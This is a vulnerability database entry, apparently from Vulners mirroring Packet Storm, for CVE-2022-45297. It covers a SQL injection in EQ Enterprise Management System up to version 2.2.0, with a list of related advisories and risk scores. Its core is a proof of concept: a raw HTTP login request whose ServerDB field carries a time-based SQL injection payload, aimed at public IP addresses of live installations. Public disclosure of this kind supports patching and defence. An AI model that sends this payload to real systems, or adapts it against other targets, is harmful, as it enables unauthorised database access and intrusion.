EQ Enterprise Management System 2.2.0 SQL Injection

🗓️ 31 Mar 2023 00:00:00Reported by TLFType

packetstorm🔗 packetstormsecurity.com👁 237 Views

EQ Enterprise Management System 2.2.0 SQL Injection CVE-2022-4529

Reporter	Title	Published	Views	Family All 12
0day.today	EQ Enterprise management system v2.2.0 - SQL Injection Vulnerability	31 Mar 202300:00	–	zdt
Circl	CVE-2022-45297	15 Feb 202300:08	–	circl
CNNVD	EQ SQL注入漏洞	31 Jan 202300:00	–	cnnvd
CVE	CVE-2022-45297	31 Jan 202300:00	–	cve
Cvelist	CVE-2022-45297	31 Jan 202300:00	–	cvelist
Exploit DB	EQ Enterprise management system v2.2.0 - SQL Injection	31 Mar 202300:00	–	exploitdb
EUVD	EUVD-2022-48197	3 Oct 202520:07	–	euvd
NVD	CVE-2022-45297	31 Jan 202322:15	–	nvd
Prion	Sql injection	31 Jan 202322:15	–	prion
Positive Technologies	PT-2023-14640 · Eq · Eq	31 Jan 202300:00	–	ptsecurity

`Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection  
Date: 2022.12.7  
Exploit Author: TLF  
Vendor Homepage: https://www.yiquantech.com/pc/about.html  
Software Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/  
Version: EQ v1.5.31 to v2.2.0  
Tested on: windows 10  
CVE : CVE-2022-45297   
  
  
POC:  
POST /Account/Login HTTP/1.1   
Host: 121.8.146.131   
User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0  
Content-Length: 118   
Accept: application/json, text/javascript, */*; q=0.01   
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Content-Type: application/x-www-form-urlencoded;   
charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg   
Origin: http://121.8.146.131  
Referer: http://121.8.146.131/Account/Login   
X-Requested-With: XMLHttpRequest   
Accept-Encoding: gzip  
RememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27  
  
`

31 Mar 2023 00:00Current

9.4High risk

Vulners AI Score9.4

CVSS 3.19.8

EPSS0.00842

SSVC